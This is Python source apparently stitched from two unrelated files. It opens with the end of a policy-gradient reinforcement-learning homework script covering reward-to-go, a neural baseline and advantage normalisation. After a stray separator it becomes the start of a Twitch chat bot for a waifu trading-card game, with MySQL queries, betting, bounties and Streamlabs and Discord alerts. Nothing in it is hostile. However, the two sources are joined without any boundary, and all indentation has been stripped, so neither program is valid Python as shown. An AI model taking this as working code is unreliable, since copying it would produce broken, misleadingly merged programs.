# You will write code for two cases, controlled by the flag 'reward_to_go':
#
# Case 1: trajectory-based PG
#
# (reward_to_go = False)
#
# Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
# entire trajectory (regardless of which time step the Q-value should be for).
#
# For this case, the policy gradient estimator is
#
# E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
#
# where
#
# Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
#
# Thus, you should compute
#
# Q_t = Ret(tau)
#
# Case 2: reward-to-go PG
#
# (reward_to_go = True)
#
# Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
# from time step t. Thus, you should compute
#
# Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
#
#
# Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
# like the 'ob_no' and 'ac_na' above.
#
# ====================================================================================#
# YOUR_CODE_HERE
# q_n = TODO
def compute_q(path_rews: np.ndarray):
q_t = 0.0
ret_q = []
for r_t in path_rews[::-1]:
q_t = r_t + gamma * q_t  # discounted running sum over rewards, traversed in reverse
if reward_to_go:
ret_q.append(q_t)
return ret_q[::-1] if reward_to_go else [q_t] * len(path_rews)
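# Sanity check (a hand-worked example, not part of the original assignment): with gamma = 0.5 and
# path_rews = [1, 1, 1], reward_to_go=True yields [1.75, 1.5, 1.0], while reward_to_go=False
# yields [1.75, 1.75, 1.75] (the full discounted return repeated for every timestep).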
q_n = np.concatenate([compute_q(path['reward']) for path in paths])
# ====================================================================================#
# ----------SECTION 5----------
# Computing Baselines
# ====================================================================================#
if nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current or previous batch of Q-values. (Goes with Hint
# #bl2 below.)
q_n_mean = np.mean(q_n)
q_n_std = np.std(q_n)
b_n = sess.run(baseline_prediction, feed_dict={
sy_ob_no: ob_no,
})
b_n = b_n * q_n_std + q_n_mean
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
# ====================================================================================#
# ----------SECTION 4----------
# Advantage Normalization
# ====================================================================================
if normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
# YOUR_CODE_HERE
adv_n_mean = np.mean(adv_n)
adv_n_std = np.std(adv_n)
adv_n = (adv_n - adv_n_mean) / adv_n_std
# ====================================================================================#
# ----------SECTION 5----------
# Optimizing Neural Network Baseline
# ====================================================================================#
if nn_baseline:
# ----------SECTION 5----------
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 above.)
# YOUR_CODE_HERE
baseline_target = (q_n - q_n_mean) / q_n_std
_ = sess.run(baseline_update_op, feed_dict={
sy_ob_no: ob_no,
sy_adv_n: baseline_target,
})
# ====================================================================================#
# ----------SECTION 4----------
# Performing the Policy Update
# ====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
# YOUR_CODE_HERE
_ = sess.run(update_op, feed_dict={
sy_ob_no: ob_no,
sy_ac_na: ac_na,
sy_adv_n: adv_n,
})
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=1)
parser.add_argument('--size', '-s', type=int, default=32)
args = parser.parse_args()
if not (os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not (os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
for e in range(args.n_experiments):
seed = args.seed + 10 * e
print('Running experiment with seed %d' % seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir, '%d' % seed),
normalize_advantages=not (args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# Run each experiment in a separate process, because TensorFlow does not handle
# repeated calls to train_PG within the same process well.
p = Process(target=train_func, args=tuple())
p.start()
p.join()
if __name__ == "__main__":
main()
|
main.py
|
#!/usr/bin/python3
# coding=utf-8
import pymysql
import pydle
import random
from random import choice
import datetime
import time
from threading import Timer, Thread
import urllib.request
import requests
import json
import threading
import math
import functools
from string import ascii_letters
from collections import defaultdict, OrderedDict
from private_functions import validateImageURL, processImageURL, tokenGachaRoll
import sys
import re
import logging
import logging.handlers
import websocket
import _thread as thread
formatter = logging.Formatter('[%(asctime)s][%(name)s][%(levelname)s] %(message)s')
logger = logging.getLogger('nepbot')
logger.setLevel(logging.DEBUG)
logger.propagate = False
fh = logging.handlers.TimedRotatingFileHandler('debug.log', when='midnight', encoding='utf-8')
fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.INFO)
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
logging.getLogger('tornado.application').addHandler(fh)
logging.getLogger('tornado.application').addHandler(ch)
ffzws = 'wss://andknuckles.frankerfacez.com'
pool = pydle.ClientPool()
current_milli_time = lambda: int(round(time.time() * 1000))
pymysql.install_as_MySQLdb()
dbpw = None
dbname = None
dbhost = None
dbuser = None
silence = False
debugMode = False
streamlabsclient = None
twitchclientsecret = None
bannedWords = []
t = None
# read config values from file (db login etc)
try:
f = open("nepbot.cfg", "r")
lines = f.readlines()
for line in lines:
name, value = line.split("=")
value = str(value).strip("\n")
logger.info("Reading config value '%s' = '<redacted>'", name)
if name == "dbpassword":
dbpw = value
if name == "database":
dbname = value
if name == "dbhost":
dbhost = value
if name == "dbuser":
dbuser = value
if name == "streamlabsclient":
streamlabsclient = value
if name == "twitchclientsecret":
twitchclientsecret = value
if name == "log":
logger.info("Setting new console log level to %s", value)
ch.setLevel(logging.getLevelName(value))
if name == "silent" and value == "True":
logger.warning("Silent mode enabled")
silence = True
if name == "debugMode" and value == "True":
logger.warning("Debug mode enabled, !as command is available")
debugMode = True
if name == "bannedWords":
bannedWords = [word.lower() for word in value.split(",")]
if dbpw is None:
logger.error("Database password not set. Please add it to the config file, with 'dbpassword=<pw>'")
sys.exit(1)
if dbname is None:
logger.error("Database name not set. Please add it to the config file, with 'database=<name>'")
sys.exit(1)
if dbhost is None:
logger.error("Database host not set. Please add it to the config file, with 'dbhost=<host>'")
sys.exit(1)
if dbuser is None:
logger.error("Database user not set. Please add it to the config file, with 'dbuser=<user>'")
sys.exit(1)
if twitchclientsecret is None:
logger.error("Twitch Client Secret not set. Please add it to the conig file, with 'twitchclientsecret=<pw>'")
sys.exit(1)
f.close()
except Exception:
logger.error("Error reading config file (nepbot.cfg), aborting.")
sys.exit(1)
db = pymysql.connect(host=dbhost, user=dbuser, passwd=dbpw, db=dbname, autocommit="True", charset="utf8mb4")
admins = []
superadmins = []
activitymap = {}
marathonActivityMap = {}
blacklist = []
config = {}
packAmountRewards = {}
emotewaremotes = []
revrarity = {}
visiblepacks = ""
validalertconfigvalues = []
discordhooks = []
busyLock = threading.Lock()
discordLock = threading.Lock()
streamlabsLock = threading.Lock()
streamlabsauthurl = "https://www.streamlabs.com/api/v1.0/authorize?client_id=" + streamlabsclient + "&redirect_uri=https://marenthyu.de/cgi-bin/waifucallback.cgi&response_type=code&scope=alerts.create&state="
streamlabsalerturl = "https://streamlabs.com/api/v1.0/alerts"
alertheaders = {"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"}
time_regex = re.compile(r'(?P<hours>[0-9]*):(?P<minutes>[0-9]{2}):(?P<seconds>[0-9]{2})(\.(?P<ms>[0-9]{1,3}))?')
waifu_regex = None
def loadConfig():
global revrarity, blacklist, visiblepacks, admins, superadmins, validalertconfigvalues, waifu_regex, emotewaremotes, discordhooks, packAmountRewards
with db.cursor() as curg:
curg.execute("SELECT * FROM config")
logger.info("Importing config from database")
for row in curg.fetchall():
config[row[0]] = row[1]
logger.debug("Config: %s", str(config))
if int(config["emoteWarStatus"]) == 1:
# emote war active, get its emotes
curg.execute("SELECT name FROM emoteWar")
emotewaremotes = [row[0] for row in curg.fetchall()]
else:
emotewaremotes = []
alertRarityRange = range(int(config["drawAlertMinimumRarity"]), int(config["numNormalRarities"]))
validalertconfigvalues = ["color", "alertChannel", "defaultLength", "defaultSound", "setClaimSound",
"setClaimLength"] \
+ ["rarity%dLength" % rarity for rarity in alertRarityRange] \
+ ["rarity%dSound" % rarity for rarity in alertRarityRange]
waifu_regex = re.compile(r'(\[(?P<id>[0-9]+?)])?(?P<name>.+?) *- *(?P<series>.+) *- *(?P<rarity>[0-' + str(
int(config["numNormalRarities"]) + int(config["numSpecialRarities"]) - 1) + r']) *- *(?P<link>.+?)$')
logger.debug("Alert config values: %s", str(validalertconfigvalues))
logger.debug("Waifu regex: %s", str(waifu_regex))
logger.info("Fetching admin list...")
curg.execute("SELECT name, super FROM admins")
admins = []
superadmins = []
for row in curg.fetchall():
admins.append(row[0])
if row[1] != 0:
superadmins.append(row[0])
logger.debug("Admins: %s", str(admins))
logger.debug("SuperAdmins: %s", str(superadmins))
revrarity = {config["rarity" + str(i) + "Name"]: i for i in
range(int(config["numNormalRarities"]) + int(config["numSpecialRarities"]))}
curg.execute("SELECT name FROM blacklist")
rows = curg.fetchall()
blacklist = []
for row in rows:
blacklist.append(row[0])
# visible packs
curg.execute("SELECT name FROM boosters WHERE listed = 1 AND buyable = 1 ORDER BY sortIndex ASC")
packrows = curg.fetchall()
visiblepacks = "/".join(row[0] for row in packrows)
# discord hooks
with discordLock:
curg.execute("SELECT url FROM discordHooks ORDER BY priority DESC")
discrows = curg.fetchall()
discordhooks = [row[0] for row in discrows]
# pack amount rewards
packAmountRewards = {}
curg.execute("SELECT boostername, de_amount, reward_booster FROM pack_amount_rewards")
rewardRows = curg.fetchall()
for row in rewardRows:
if row[0] not in packAmountRewards:
packAmountRewards[row[0]] = {}
packAmountRewards[row[0]][int(row[1])] = row[2]
def checkAndRenewAppAccessToken():
global config, headers
krakenHeaders = {"Authorization": "OAuth %s" % config["appAccessToken"]}
r = requests.get("https://api.twitch.tv/kraken", headers=krakenHeaders)
resp = r.json()
if "identified" not in resp or not resp["identified"]:
# app access token has expired, get a new one
logger.debug("Requesting new token")
url = 'https://id.twitch.tv/oauth2/token?client_id=%s&client_secret=%s&grant_type=client_credentials' % (
config["clientID"], twitchclientsecret)
r = requests.post(url)
try:
jsondata = r.json()
if 'access_token' not in jsondata or 'expires_in' not in jsondata:
raise ValueError("Invalid Twitch API response, can't get an app access token.")
config["appAccessToken"] = jsondata['access_token']
logger.debug("request done")
cur = db.cursor()
cur.execute("UPDATE config SET value = %s WHERE name = 'appAccessToken'", [jsondata['access_token']])
cur.close()
headers = {"Authorization": "Bearer %s" % config["appAccessToken"]}
except ValueError as error:
logger.error("Access Token renew/get request was not successful")
raise error
def booleanConfig(name):
return name in config and config[name].strip().lower() not in ["off", "no", "false"]
def placeBet(channel, userid, betms):
cur = db.cursor()
cur.execute("SELECT id FROM bets WHERE channel = %s AND status = 'open' LIMIT 1", [channel])
row = cur.fetchone()
if row is None:
cur.close()
return False
cur.execute("REPLACE INTO placed_bets (betid, userid, bet, updated) VALUE (%s, %s, %s, %s)",
[row[0], userid, betms, current_milli_time()])
cur.close()
return True
def endBet(channel):
# find started bet data
cur = db.cursor()
cur.execute("SELECT id FROM bets WHERE channel = %s AND status = 'started' LIMIT 1", [channel])
row = cur.fetchone()
if row is None:
cur.close()
return None
# mark the bet as closed
endTime = current_milli_time()
cur.execute("UPDATE bets SET status = 'completed', endTime = %s WHERE id = %s", [endTime, row[0]])
# calculate preliminary results
cur.close()
return getBetResults(row[0])
def getBetResults(betid):
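# Returns the run's elapsed time plus every placed bet sorted closest-first, each with its signed
# delta from the result; returns None if the bet does not exist or is not completed/paid yet.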
# get bet data
cur = db.cursor()
cur.execute("SELECT status, startTime, endTime FROM bets WHERE id = %s", [betid])
betrow = cur.fetchone()
if betrow is None:
cur.close()
return None
if betrow[0] != 'completed' and betrow[0] != 'paid':
cur.close()
return None
timeresult = betrow[2] - betrow[1]
cur.execute(
"SELECT bet, userid, users.name FROM placed_bets INNER JOIN users ON placed_bets.userid = users.id WHERE betid = %s ORDER BY updated ASC",
[betid])
rows = cur.fetchall()
placements = sorted(rows, key=lambda row: abs(int(row[0]) - timeresult))
actualwinners = [{"id": row[1], "name": row[2], "bet": row[0], "timedelta": row[0] - timeresult} for row in
placements]
cur.close()
return {"result": timeresult, "winners": actualwinners}
class NotEnoughBetsException(Exception):
pass
class NoBetException(Exception):
pass
class NotOpenLongEnoughException(Exception):
pass
def startBet(channel, confirmed=False):
with db.cursor() as cur:
cur.execute("SELECT id, openedTime FROM bets WHERE channel = %s AND status = 'open' LIMIT 1", [channel])
row = cur.fetchone()
if row is not None:
if not confirmed:
cur.execute("SELECT COUNT(*) FROM placed_bets WHERE betid = %s", [row[0]])
if cur.fetchone()[0] < int(config["betMinimumEntriesForPayout"]):
raise NotEnoughBetsException()
if row[1] is not None and int(row[1]) + int(config["betMinimumMinutesOpen"])*60000 > current_milli_time():
raise NotOpenLongEnoughException()
cur.execute("UPDATE bets SET startTime = %s, status = 'started' WHERE id = %s", [current_milli_time(), row[0]])
else:
raise NoBetException()
def openBet(channel):
cur = db.cursor()
cur.execute("SELECT COUNT(*) FROM bets WHERE channel = %s AND status IN('open', 'started')", [channel])
result = cur.fetchone()[0] or 0
if result > 0:
cur.close()
return False
else:
cur.execute("INSERT INTO bets(channel, status, openedTime) VALUES (%s, 'open', %s)", [channel, current_milli_time()])
cur.close()
return True
def cancelBet(channel):
cur = db.cursor()
affected = cur.execute("UPDATE bets SET status = 'cancelled' WHERE channel = %s AND status IN('open', 'started')",
[channel])
cur.close()
return affected > 0
def getHand(twitchid):
try:
tID = int(twitchid)
except Exception:
logger.error("Got non-integer id for getHand. Aborting.")
return []
cur = db.cursor()
cur.execute(
"SELECT amount, waifus.name, waifus.id, rarity, series, image, base_rarity, custom_image FROM has_waifu JOIN waifus ON has_waifu.waifuid = waifus.id WHERE has_waifu.userid = %s ORDER BY (rarity < %s) DESC, waifus.id ASC",
[tID, int(config["numNormalRarities"])])
rows = cur.fetchall()
cur.close()
return [{"name": row[1], "amount": row[0], "id": row[2], "rarity": row[3], "series": row[4], "image": row[7] or row[5],
"base_rarity": row[6]} for row in rows]
def search(query, series=None):
cur = db.cursor()
if series is None:
cur.execute("SELECT id, Name, series, base_rarity FROM waifus WHERE can_lookup = 1 AND Name LIKE %s",
["%" + query + "%"])
else:
cur.execute(
"SELECT id, Name, series, base_rarity FROM waifus WHERE can_lookup = 1 AND Name LIKE %s AND series LIKE %s",
["%" + query + "%", "%" + series + "%"])
rows = cur.fetchall()
ret = []
for row in rows:
ret.append({'id': row[0], 'name': row[1], 'series': row[2], 'base_rarity': row[3]})
return ret
def handLimit(userid):
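# Hand size = 7 base slots + purchased upgrades + free upgrades, read straight from the users table.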
with db.cursor() as cur:
cur.execute("SELECT 7 + paidHandUpgrades + freeUpgrades FROM users WHERE id = %s", [userid])
res = cur.fetchone()
limit = int(res[0])
return limit
def paidHandUpgrades(userid):
cur = db.cursor()
cur.execute("SELECT paidHandUpgrades FROM users WHERE id = %s", [userid])
res = cur.fetchone()
limit = int(res[0])
cur.close()
return limit
def currentCards(userid, verbose=False):
cur = db.cursor()
cur.execute(
"SELECT (SELECT COALESCE(SUM(amount), 0) FROM has_waifu WHERE userid = %s AND rarity < %s), (SELECT COUNT(*) FROM bounties WHERE userid = %s AND status = 'open')",
[userid, int(config["numNormalRarities"]), userid])
result = cur.fetchone()
cur.close()
if verbose:
return {"hand": result[0], "bounties": result[1], "total": result[0] + result[1]}
else:
return result[0] + result[1]
def upgradeHand(userid, gifted=False):
cur = db.cursor()
cur.execute(
"UPDATE users SET paidHandUpgrades = paidHandUpgrades + %s, freeUpgrades = freeUpgrades + %s WHERE id = %s",
[0 if gifted else 1, 1 if gifted else 0, userid])
cur.close()
def attemptBountyFill(bot, waifuid):
# return profit from the bounty
with db.cursor() as cur:
cur.execute(
"SELECT bounties.id, bounties.userid, users.name, bounties.amount, waifus.name, waifus.base_rarity FROM bounties JOIN users ON bounties.userid = users.id JOIN waifus ON bounties.waifuid = waifus.id WHERE bounties.waifuid = %s AND bounties.status = 'open' ORDER BY bounties.amount DESC LIMIT 1",
[waifuid])
order = cur.fetchone()
if order is not None:
# fill their order instead of actually disenchanting
giveCard(order[1], waifuid, order[5])
bot.message('#%s' % order[2],
"Your bounty for [%d] %s for %d points has been filled and they have been added to your hand." % (
waifuid, order[4], order[3]), True)
cur.execute("UPDATE bounties SET status = 'filled', updated = %s WHERE id = %s",
[current_milli_time(), order[0]])
# alert people with lower bounties but above the cap?
base_value = int(config["rarity" + str(order[5]) + "Value"])
min_bounty = int(config["rarity" + str(order[5]) + "MinBounty"])
rarity_cap = int(config["rarity" + str(order[5]) + "MaxBounty"])
cur.execute(
"SELECT users.name FROM bounties JOIN users ON bounties.userid = users.id WHERE bounties.waifuid = %s AND bounties.status = 'open' AND bounties.amount > %s",
[waifuid, rarity_cap])
for userrow in cur.fetchall():
bot.message('#%s' % userrow[0],
"A higher bounty for [%d] %s than yours was filled, so you can now cancel yours and get full points back provided you don't change it." % (
waifuid, order[4]), True)
# give the disenchanter appropriate profit
# everything up to the min bounty, 1/2 of any amount between the min and max bounties, 1/4 of anything above the max bounty.
return (min_bounty - base_value) + max(min(order[3] - min_bounty, rarity_cap - min_bounty) // 2, 0) + max((order[3] - rarity_cap) // 4, 0)
else:
# no bounty
return 0
def setFavourite(userid, waifu):
with db.cursor() as cur:
cur.execute("UPDATE users SET favourite=%s WHERE id = %s", [waifu, userid])
def setDescription(userid, newDesc):
with db.cursor() as cur:
cur.execute("UPDATE users SET profileDescription=%s WHERE id = %s", [newDesc, userid])
def checkFavouriteValidity(userid):
with db.cursor() as cur:
cur.execute("SELECT favourite FROM users WHERE id = %s", [userid])
favourite = getWaifuById(cur.fetchone()[0])
valid = True
if favourite["can_favourite"] == 0:
valid = False
elif favourite["base_rarity"] >= int(config["numNormalRarities"]):
# must be owned
cur.execute("SELECT COUNT(*) FROM has_waifu WHERE waifuid = %s AND userid = %s", [favourite["id"], userid])
valid = cur.fetchone()[0] > 0
if not valid:
# reset favourite
cur.execute("UPDATE users SET favourite = 1 WHERE id = %s", [userid])
def getBadgeByID(id):
logger.debug("Getting badge for id %s", id)
try:
id = int(id)
if id < 1 or id > maxBadgeID():
logger.debug("ID was smaller than 1 or bigger than max.")
return None
except ValueError:
logger.debug("ValueError, not an int")
return None
cur = db.cursor()
cur.execute("SELECT id, name, description, image FROM badges WHERE id=%s",
[id])
row = cur.fetchone()
ret = {"id": row[0], "name": row[1], "image": row[3], "description": row[2]}
cur.close()
logger.debug("Fetched Badge from id: %s", ret)
return ret
def addBadge(name, description, image):
"""Adds a new Badge to the database"""
with db.cursor() as cur:
cur.execute("INSERT INTO badges(name, description, image) VALUES(%s, %s, %s)", [name, description, image])
return cur.lastrowid
def giveBadge(userid, badge):
"""Gives a user a badge"""
badgeObj = getBadgeByID(badge)
if badgeObj is None:
return False
else:
try:
with db.cursor() as cur:
cur.execute("INSERT INTO has_badges(userID, badgeID) VALUES(%s, %s)", [userid, badge])
except Exception:
logger.debug("Error giving badge %s to user %s.", badge, userid)
return False
return True
def getHoraro():
r = requests.get(
"https://horaro.org/-/api/v1/schedules/{horaroid}/ticker".format(horaroid=config["horaroID"]))
try:
j = r.json()
# ("got horaro ticker: " + str(j))
return j
except Exception:
logger.error("Horaro Error:")
logger.error(str(r.status_code))
logger.error(r.text)
def getRawRunner(runner):
if '[' not in runner:
return runner
return runner[runner.index('[') + 1 : runner.index(']')]
def updateBoth(game, title):
if not booleanConfig("marathonBotFunctions"):
return
myheaders = headers.copy()
myheaders["Authorization"] = "OAuth " + config["marathonOAuth"].replace("oauth:", "")
myheaders["Content-Type"] = "application/json"
myheaders["Accept"] = "application/vnd.twitchtv.v5+json"
body = {"channel": {"status": str(title), "game": str(game)}}
logger.debug(str(body))
r = requests.put("https://api.twitch.tv/kraken/channels/"+config["marathonChannelID"], headers=myheaders, json=body)
try:
j = r.json()
logger.debug("Response from twitch: "+str(j))
# print("tried to update channel title, response: " + str(j))
except Exception:
logger.error(str(r.status_code))
logger.error(r.text)
def updateTitle(title):
if not booleanConfig("marathonBotFunctions"):
return
myheaders = headers.copy()
myheaders["Authorization"] = "OAuth " + config["marathonOAuth"].replace("oauth:", "")
myheaders["Content-Type"] = "application/json"
myheaders["Accept"] = "application/vnd.twitchtv.v5+json"
body = {"channel": {"status": str(title)}}
r = requests.put("https://api.twitch.tv/kraken/channels/"+config["marathonChannelID"], headers=myheaders, json=body)
try:
j = r.json()
except Exception:
logger.error(str(r.status_code))
logger.error(r.text)
def updateGame(game):
if not booleanConfig("marathonBotFunctions"):
return
myheaders = headers.copy()
myheaders["Authorization"] = "OAuth " + config["marathonOAuth"].replace("oauth:", "")
myheaders["Content-Type"] = "application/json"
myheaders["Accept"] = "application/vnd.twitchtv.v5+json"
body = {"channel": {"game": str(game)}}
r = requests.put("https://api.twitch.tv/kraken/channels/"+config["marathonChannelID"], headers=myheaders, json=body)
try:
j = r.json()
except Exception:
logger.error(str(r.status_code))
logger.error(r.text)
def sendStreamlabsAlert(channel, data):
if '#' in channel:
channel = channel[1:]
with busyLock:
with db.cursor() as cur:
cur.execute("SELECT alertkey FROM channels WHERE name = %s LIMIT 1", [channel])
tokenRow = cur.fetchone()
if tokenRow is not None and tokenRow[0] is not None:
data['access_token'] = tokenRow[0]
with streamlabsLock:
try:
req = requests.post(streamlabsalerturl, headers=alertheaders, json=data)
if req.status_code != 200:
logger.debug("response for streamlabs alert: %s; %s", str(req.status_code), str(req.text))
except Exception:
logger.error("Tried to send a Streamlabs alert to %s, but failed." % channel)
logger.error("Error: %s", str(sys.exc_info()))
def sendDiscordAlert(data):
with discordLock:
for url in discordhooks:
req2 = requests.post(
url,
json=data)
while req2.status_code == 429:
time.sleep((int(req2.headers["Retry-After"]) / 1000) + 1)
req2 = requests.post(
url,
json=data)
def sendAdminDiscordAlert(data):
with discordLock:
req2 = requests.post(config["adminDiscordHook"], json=data)
while req2.status_code == 429:
time.sleep((int(req2.headers["Retry-After"]) / 1000) + 1)
req2 = requests.post(
config["adminDiscordHook"],
json=data)
def sendDrawAlert(channel, waifu, user, discord=True):
logger.info("Alerting for waifu %s", str(waifu))
with busyLock:
cur = db.cursor()
# check for first time drop
first_time = "pulls" in waifu and waifu['pulls'] == 0
message = "*{user}* drew {first_time}[*{rarity}*] {name}!".format(user=str(user),
rarity=str(config["rarity" + str(
waifu["base_rarity"]) + "Name"]),
name=str(waifu["name"]),
first_time=(
"the first ever " if first_time else ""))
chanOwner = str(channel).replace("#", "")
cur.execute("SELECT config, val FROM alertConfig WHERE channelName = %s", [chanOwner])
rows = cur.fetchall()
colorKey = "rarity" + str(waifu["base_rarity"]) + "EmbedColor"
colorInt = int(config[colorKey])
# Convert RGB int to RGB values
blue = colorInt & 255
green = (colorInt >> 8) & 255
red = (colorInt >> 16) & 255
alertconfig = {}
for row in rows:
alertconfig[row[0]] = row[1]
keys = alertconfig.keys()
alertChannel = "donation" if "alertChannel" not in keys else alertconfig["alertChannel"]
defaultSound = config["alertSound"] if "defaultSound" not in keys else alertconfig["defaultSound"]
alertSound = defaultSound if str("rarity" + str(waifu["base_rarity"]) + "Sound") not in keys else alertconfig[
str("rarity" + str(waifu["base_rarity"]) + "Sound")]
defaultLength = config["alertDuration"] if "defaultLength" not in keys else alertconfig["defaultLength"]
alertLength = defaultLength if str("rarity" + str(waifu["base_rarity"]) + "Length") not in keys else \
alertconfig[str("rarity" + str(waifu["base_rarity"]) + "Length")]
alertColor = "default" if "color" not in keys else alertconfig["color"]
if "id" in waifu:
cur.execute("SELECT sound, length FROM waifuAlerts WHERE waifuid=%s", [waifu["id"]])
rows = cur.fetchall()
if len(rows) == 1:
alertLength = int(rows[0][1])
alertSound = str(rows[0][0])
alertbody = {"type": alertChannel, "image_href": waifu["image"],
"sound_href": alertSound, "duration": int(alertLength), "message": message}
if alertColor == "rarity":
alertbody["special_text_color"] = "rgb({r}, {g}, {b})".format(r=str(red), g=str(green), b=str(blue))
cur.close()
threading.Thread(target=sendStreamlabsAlert, args=(channel, alertbody)).start()
if discord:
# check for first time drop
rarityName = str(config["rarity" + str(waifu["base_rarity"]) + "Name"])
discordbody = {"username": "Waifu TCG", "embeds": [
{
"title": "A{n} {rarity} waifu has been dropped{first_time}!".format(
rarity=rarityName,
first_time=(" for the first time" if first_time else ""),
n='n' if rarityName[0] in ('a', 'e', 'i', 'o', 'u') else '')
},
{
"type": "rich",
"title": "{user} dropped {name}!".format(user=str(user), name=str(waifu["name"])),
"url": "https://twitch.tv/{name}".format(name=str(channel).replace("#", "").lower()),
"footer": {
"text": "Waifu TCG by Marenthyu"
},
"image": {
"url": str(waifu["image"])
},
"provider": {
"name": "Marenthyu",
"url": "https://marenthyu.de"
}
}
]}
if colorKey in config:
discordbody["embeds"][0]["color"] = int(config[colorKey])
discordbody["embeds"][1]["color"] = int(config[colorKey])
threading.Thread(target=sendDiscordAlert, args=(discordbody,)).start()
def sendDisenchantAlert(channel, waifu, user):
# no streamlabs alert for now
# todo maybe make a b&w copy of the waifu image
discordbody = {"username": "Waifu TCG", "embeds": [
{
"title": "A {rarity} waifu has been disenchanted!".format(
rarity=str(config["rarity" + str(waifu["base_rarity"]) + "Name"]))
},
{
"type": "rich",
"title": "{name} has been disenchanted! Press F to pay respects.".format(name=str(waifu["name"])),
"footer": {
"text": "Waifu TCG by Marenthyu"
},
"image": {
"url": str(waifu["image"])
},
"provider": {
"name": "Marenthyu",
"url": "https://marenthyu.de"
}
}
]}
colorKey = "rarity" + str(waifu["base_rarity"]) + "EmbedColor"
if colorKey in config:
discordbody["embeds"][0]["color"] = int(config[colorKey])
discordbody["embeds"][1]["color"] = int(config[colorKey])
threading.Thread(target=sendDiscordAlert, args=(discordbody,)).start()
def sendPromotionAlert(userid, waifuid, new_rarity):
with busyLock:
# check for duplicate alert and don't send it
# UNLESS this is a promotion to MAX rarity
if new_rarity != int(config["numNormalRarities"]) - 1:
with db.cursor() as cur:
cur.execute(
"SELECT COUNT(*) FROM promotion_alerts_sent WHERE userid = %s AND waifuid = %s AND rarity >= %s",
[userid, waifuid, new_rarity])
result = cur.fetchone()[0]
if result > 0:
return
# get data necessary for the alert and note that we sent it
# TODO maybe use display name instead
waifu = getWaifuById(waifuid)
with db.cursor() as cur:
cur.execute("SELECT name FROM users WHERE id = %s", [userid])
username = cur.fetchone()[0]
cur.execute("REPLACE INTO promotion_alerts_sent (userid, waifuid, rarity) VALUES(%s, %s, %s)",
[userid, waifuid, new_rarity])
# compile alert
discordbody = {"username": "Waifu TCG", "embeds": [
{
"title": "A waifu has been promoted!",
"color": int(config["rarity%dEmbedColor" % new_rarity])
},
{
"type": "rich",
"title": "{user} promoted {name} to {rarity} rarity!".format(user=username, name=waifu["name"],
rarity=config[
"rarity%dName" % new_rarity]),
"color": int(config["rarity%dEmbedColor" % new_rarity]),
"footer": {
"text": "Waifu TCG by Marenthyu"
},
"image": {
"url": waifu["image"]
},
"provider": {
"name": "Marenthyu",
"url": "https://marenthyu.de"
}
}
]}
threading.Thread(target=sendDiscordAlert, args=(discordbody,)).start()
def naturalJoinNames(names):
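# e.g. ["A"] -> "A"; ["A", "B", "C"] -> "A, B and C"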
if len(names) == 1:
return names[0]
return ", ".join(names[:-1]) + " and " + names[-1]
def getWaifuRepresentationString(waifuid, baserarity=None, cardrarity=None, waifuname=None):
if baserarity is None or cardrarity is None or waifuname is None:
waifuData = getWaifuById(waifuid)
if baserarity is None:
baserarity = waifuData['base_rarity']
